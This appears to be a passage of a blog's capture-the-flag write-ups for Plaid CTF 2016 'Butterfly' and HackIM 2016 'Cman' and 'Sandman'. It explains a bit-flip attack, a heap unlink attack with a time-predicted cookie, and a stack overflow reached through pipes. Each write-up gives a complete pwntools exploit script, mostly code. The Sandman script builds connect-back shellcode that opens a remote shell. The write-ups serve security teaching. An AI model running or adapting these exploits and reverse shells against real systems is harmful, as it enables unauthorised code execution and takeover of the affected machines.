#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')

"""
152108: dec  ecx
152108: mov  ebx, esp
152108: inc  edx
"""
soc.sendline('152108')

"""
134498: xchg            eax, edi
134498: xor             ecx, ecx
134498: inc             edx
"""
soc.sendline('134498')

"""
100487: das             
100487: push            ecx
100487: xchg            eax, esi
100487: inc             edx
"""
soc.sendline('100487')
# for pop edx
soc.sendline('100487')

"""
151060: cmc  
151060: mul  ecx
151060: inc  edx
"""
soc.sendline('151060')

"""
46691: pop  ecx
46691: mov  al, 0xb
46691: inc  edx
"""
soc.sendline('46691')

"""
9464 : pop  edx
9464 : and  edx, 0x40
"""
soc.sendline('9464')

"""
1377666: dec  edi
1377666: int  0x80
1377666: inc  esp
"""
soc.sendline('1377666')
soc.sendline('DONE')
soc.recvline()

soc.interactive()
# PCTF{why_isnt_IEEE_754_IEEE_7.54e2}

Plaid CTF 2016 - Butterfly

butterfly is a 64 bit executable with NX and stack canaries enabled.

[+] The binary reads 50 bytes through fgets, converts it to integer(address) using strtol
[+] This address is page aligned and made writable using mprotect
[+] The address is processed and then used for bit flip
[+] mprotect is called again to remove write permissions

So, we need to use the bit flip to gain control of execution. Below are the bit flips done in sequence to get code execution:

[+] 0x0400860 add rsp,0x48 -> push 0x5b48c483. This will point RSP into the fgets buffer on return from function
[+] Then return to 0x04007B8 to achieve multiple bit flips
[+] Bypass stack canary check by flipping, 0x40085b jne stack_check_fail -> 0x40085b je stack_check_fail
[+] Modify second mprotect call's argument to keep the RWX permission, 0x40082f mov edx,0x5 -> mov edx,0x7
[+] Modify first mproect call's argument as, 0x4007ef mov r15,rbp -> mov r15,r13. Since r13 holds an address in stack, this will make stack RWX
[+] Send the shellcode in next call to fgets and return to 0x400993 [jmp rsp] to execute the shellcode

Below is the exploit:

#!/usr/bin/env python

from pwn import *

HOST = '127.0.0.1'
HOST = 'butterfly.pwning.xxx'
PORT = 9999
context.arch = 'x86_64'

soc = remote(HOST, PORT)
soc.recvline()

def send_payload(address_to_flip, address_to_ret, shellcode = ''):
    global soc
    payload  = str(address_to_flip) + chr(0) 
    payload += "A" * (8 - (len(payload) % 8))
    payload += p64(address_to_ret)
    payload += shellcode
    soc.sendline(payload)
    soc.recvline()

# add rsp, 0x48
send_payload(33571589, 0x4007B8)

# jnz short stack_check_fail
send_payload(33571544, 0x4007B8)

# mov edx, 5
send_payload(33571201, 0x4007B8)

# mov r15, rbp
send_payload(33570682, 0x4007B8)

# make stack executable and jump to shellcode
shell = asm(shellcraft.amd64.linux.sh())
send_payload(33571864, 0x400993, shell)

soc.interactive()
# PCTF{b1t_fl1ps_4r3_0P_r1t3}

Wednesday, February 3, 2016

HackIM CTF 2016 - Exploitation 300 - Cman

Cman is a 64 bit statically linked and stripped ELF without NX protection. I used IDA's sigmake to generate libc signatures for this binary. The program is a contact manager providing options to add, delete, edit contacts etc.

Function @00000000004021CA reads option from user and calls the necessary functions:
A = ADD_CONTACT@00000000004019B4
D = DELETE_CONTACT@0000000000401C0D
E = EDIT_CONTACT@0000000000401EBD
X = EXIT@000000000040105E
L = LIST_CONTACT@00000000004016E2
S = MANAGE_CONTACT@0000000000401F2D
MANAGE_CONTACT provides many other options
d - delete 
e - edit
p - previous
n - next
q - quit
s - show
Contacts are saved in structures connected using doubly linked list data strucure. Below is the structure being used:
struct contact {
 char fname[64];
 char lname[64];
 char phone[14];
 char header[4];
 char gender[1];
 char unused[1];
 char cookie[4];
 long int empty;
 struct contact *prev;
 struct contact *next; 
};
The pointer @00000000006C3D58 points to head of doubly linked list. This turned out to be useful for exploitation. The program performs two initialization operations - setup a cookie value and add couple of contacts to the manager.

Cookie is set using functions @000000000040216D and @0000000000401113. The algorithm for cookie generation depends on current time.
char cookie[4];
secs = time(0);
_srandom(secs);

for (count = 0; count < sz; count++) {
    cookie[count] = rand();
}
cookie |= 0x80402010
Analyzing the function @0000000000401C5E used for editing a contact, I found a bug.
write("New last name: ");
read(&user_input, 64, 0xA);
......
write("New phone number: ");
read(&user_input, 14, 0xA); // fill the entire 14 bytes so that there is no NUL termination
    
if (user_input) {
   memset(object + 128, 0, 16);
   sz = strlen(&user_input);
   if ( sz > 16 ) sz = 64; // size becomes > 16 as strlen computes length on non-NUL terminated string from last name
   memcpy(object + 128, &user_input, sz); // overflows entries in chunk and corrupts heap meta data
}
Everytime the contact is edited, the cookie value in structure is checked for corruption:
if ( *(object + 148) != COOKIE ) {
    IO_puts("** Corruption detected. **");
    exit(-1);
}
To exploit this bug and overwrite the prev and next pointers of structure, cookie check needs to be bypassed. Note that cookie is generated based on current time as time(0). Checking the remote server time as below, I found that the epoch time is same as mine [Time=56ACC320].
nmap -sV 52.72.171.221 -p 22
SF-Port22-TCP:V=6.40%I=7%D=1/30%Time=56ACC320%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\.4\r\n"); 
So cookie value can be found by guessing the time, thus overflowing the prev and next pointers. Then doubly linked list delete operation can be triggered to get a write-anything-anywhere primitive. Since the binary is statically linked, one cannot target GOT entries as we do normally. So I started looking for other data structures in binary

_IO_puts was making the below call:
.text:0000000000409FF7 mov     rax, [rdi+0D8h]
.text:0000000000409FFE mov     rdx, rbp
.text:000000000040A001 mov     rsi, r12
.text:000000000040A004 call    qword ptr [rax+38h] 
This code is coming as part of call to _IO_sputn (_IO_stdout, str, len). RDI points to struct _IO_FILE_plus(_IO_stdout) in .data segment, which holds pointer to struct _IO_jump_t
struct _IO_FILE_plus
{
    _IO_FILE file;
    const struct _IO_jump_t *vtable;
};

struct _IO_jump_t
{
    JUMP_FIELD(_G_size_t, __dummy);
    #ifdef _G_USING_THUNKS
        JUMP_FIELD(_G_size_t, __dummy2);
    #endif
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);  // this gets called
So the idea here is to overwrite the vtable pointer with address of contact_head_ptr(.bss) - 0x38. So call qword ptr [rax+38h] will land in contact[0].fname thus directly bypassing ASLR to execute shellcode.

Note that, function checking for valid names, checks only the first character
bool check_name(char *name) {
  return *name > '@' && *name <= 'Z';
}
Below is the full exploit:
#!/usr/bin/env python

from pwn import *
import ctypes
import random

HOST = '52.72.171.221'
HOST = '127.0.0.1'
PORT = 9983
context.arch = 'x86_64'

libc = ctypes.cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def get_local_time(): return libc.time(0)

def get_cookie(time):
    libc.srandom(time)
    cookie = 0
    for x in range(4):
        random  = libc.rand() & 0xff
        cookie |= (random << (8 * x))
    cookie |= 0x80402010
    return p32(cookie)

def add_node(soc, fname, lname, number, gender):
    soc.sendline("A")
    soc.sendlineafter("First: ", fname)
    soc.sendlineafter("Last: ", lname)
    soc.sendlineafter("Phone Number: ", number)
    soc.sendlineafter("Gender: ", gender)

def edit_node(soc, fname, lname, new_fname, new_lname, new_number, new_gender):
    soc.sendline("E")
    soc.sendlineafter("First: ", fname)
    soc.sendlineafter("Last: ", lname)
    soc.recvline()
    soc.sendlineafter("New first name: ", new_fname)
    soc.sendlineafter("New last name: ", new_lname)
    soc.sendlineafter("New phone number: ", new_number)
    soc.sendlineafter("New gender: ", new_gender)

def delete_node(soc, fname, lname):
    soc.sendline("D")
    soc.sendlineafter("First: ", fname)
    soc.sendlineafter("Last: ", lname)

while True:
    local_time = get_local_time()
    cookie = get_cookie(local_time + random.randint(0,5))
    soc = remote(HOST, PORT)
    soc.recvline()

    # edit already existing node to add shellcode
    fname = "Robert"
    lname = "Morris"
    new_fname  = "P" + asm(shellcraft.amd64.linux.sh())
    new_lname  = lname
    new_number = "(123)123-1111"
    edit_node(soc, fname, lname, new_fname, new_lname, new_number, 'M')

    # create a new node to overflow
    fname = "A"*8
    lname = fname 
    number = "(123)123-1111"
    add_node(soc, fname, lname, number, 'M')

    # overflow node
    new_fname = fname
    head_ptr = 0x6C3D58
    prev_ptr = p64(head_ptr - 0x38)
    
    # _IO_puts calls _IO_sputn
    # .text:0000000000409FF7 mov     rax, [rdi+0D8h]
    # .text:0000000000409FFE mov     rdx, rbp
    # .text:000000000040A001 mov     rsi, r12
    # .text:000000000040A004 call    qword ptr [rax+38h]
    # RDI points to struct _IO_FILE_plus(_IO_stdout), which holds pointer to struct _IO_jump_t
    # overwrite pointer to _IO_jump_t with address of head node ptr-0x38 

    IO_FILE_plus = 0x6C2498
    next_ptr = p64(IO_FILE_plus - 0xA0)
    chunk_sz = p64(0xC1)[:-1]

    new_lname = "C"*20 + cookie + p64(0) + prev_ptr + next_ptr + p64(0) + chunk_sz
    new_number = "(123)123-11111"
    edit_node(soc, fname, lname, new_fname, new_lname, new_number, 'M')

    res = soc.recvline().strip()
    if res == "** Corruption detected. **": soc.close()
    else: break

print "[+] Found Cookie : %x" % u32(cookie)

# trigger overwrite due to linked list operation
delete_node(soc, fname, lname)

print "[+] Getting shell"
soc.interactive()

# flag-{h34pp1es-g3771ng-th3r3}

HackIM CTF 2016 - Exploitation 200 - Sandman

sandman is a 64 bit ELF without much memory protections
$ checksec --file ./sandman
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   ./sandman
sandman binary spawns a child process using fork. Parent and child could communicate via pipes. The parent process creates memory page with RWX permission of user specified size and reads data into it. SECCOMP is used to allow only a white list of syscalls - read, write, exit. After this the mmap region is called to execute supplied code.

Though we have code execution, it has limited use since only read/write syscalls could be made. Then I started analyzing the child process since communication can be done over pipes.

The function cmd_http_fetch@0000000000400CCA could be invoked by sending a value 0xE to the child. Further user input is read into a calloc buffer. Then function @0000000000400BAC is invoked to process this buffer. The function expects the buffer to start with 'http://' and later copies the data into stack, resulting in buffer overflow
len = strlen((user_input + 7));
strncpy(&dest, (user_input + 7), len);
So the idea of exploit is to use write syscalls in parent process to communicate with child to trigger the buffer overflow. Also there is no seccomp protection in child process. Since child is spawned using fork, RSP from parent could be used to compute the buffer address pointing to shellcode in child by a fixed offset thus bypassing ASLR. Below is the exploit:
#!/usr/bin/env python

from pwn import *

HOST = "52.72.171.221"
HOST = "127.0.0.1"
PORT = 9982
conn = remote(HOST, PORT)
context.arch = 'x86_64'

sc  = shellcraft.amd64.linux.syscall('SYS_alarm', 0) 
sc += shellcraft.amd64.linux.connect('127.1.1.1', 12345) 
sc += shellcraft.amd64.linux.dupsh()
sc  = asm(sc)

def gen_payload(sc):
    # pad for QWORDs
    sc += asm("nop") * (8 - (len(sc) % 8))
    payload = ''
    # generate mov rbx, QWORD; push rbx; sequence
    for i in range(0, len(sc), 8):
        qword = u64(sc[i:i+8])
        payload = asm("mov rbx, %d" % (qword)) + asm("push rbx") + payload
    return payload, len(sc)/8

pipe = 0x5
pipe = 0x4

size = p32(8092)
conn.send(size)

# send choice
shellcode  = asm("push 0xe")
shellcode += asm(shellcraft.amd64.linux.syscall('SYS_write', pipe, 'rsp', 1))

# send size
shellcode += asm("push 0x1000")
shellcode += asm(shellcraft.amd64.linux.syscall('SYS_write', pipe, 'rsp', 4))

# prepare payload for buffer overflow
# new line
shellcode += asm("mov rbx, 0x0a0a0a0a0a0a0a0a")
shellcode += asm("push rbx")

# padding for 4096 bytes
shellcode += asm("mov rbx, 0x9090909090909090")
shellcode += asm("push rbx") * 440

# RIP overwrite + ASLR bypass
shellcode += asm("mov rbx, rsp")
shellcode += asm("add rbx, 0xb20")
shellcode += asm("shr rbx, 0x8")
shellcode += asm("push rbx")

# last byte of address
shellcode += asm("mov rbx, 0xffffffffffffffff")
shellcode += asm("push rbx")

# fill buffer
shellcode += asm("mov rbx, 0x9090909090909090")
shellcode += asm("push rbx") * 5

# connect back shellcode
execve, qwords = gen_payload(sc)
shellcode += execve

# NOPs
shellcode += asm("mov rbx, 0x9090909090909090")
shellcode += asm("push rbx") * (63 - qwords)

# HTTP header
shellcode += asm("mov rbx, 0x902f2f3a70747468")
shellcode += asm("push rbx")

# write payload
shellcode += asm(shellcraft.amd64.linux.syscall('SYS_write', pipe, 'rsp', 0x1000))

# exit
shellcode += asm(shellcraft.amd64.linux.syscall('SYS_exit', 0))

shellcode += asm("nop") * (8091 - len(shellcode))
conn.send(shellcode + chr(0xa))

# flag-{br3k1ng-b4d-s4ndm4n}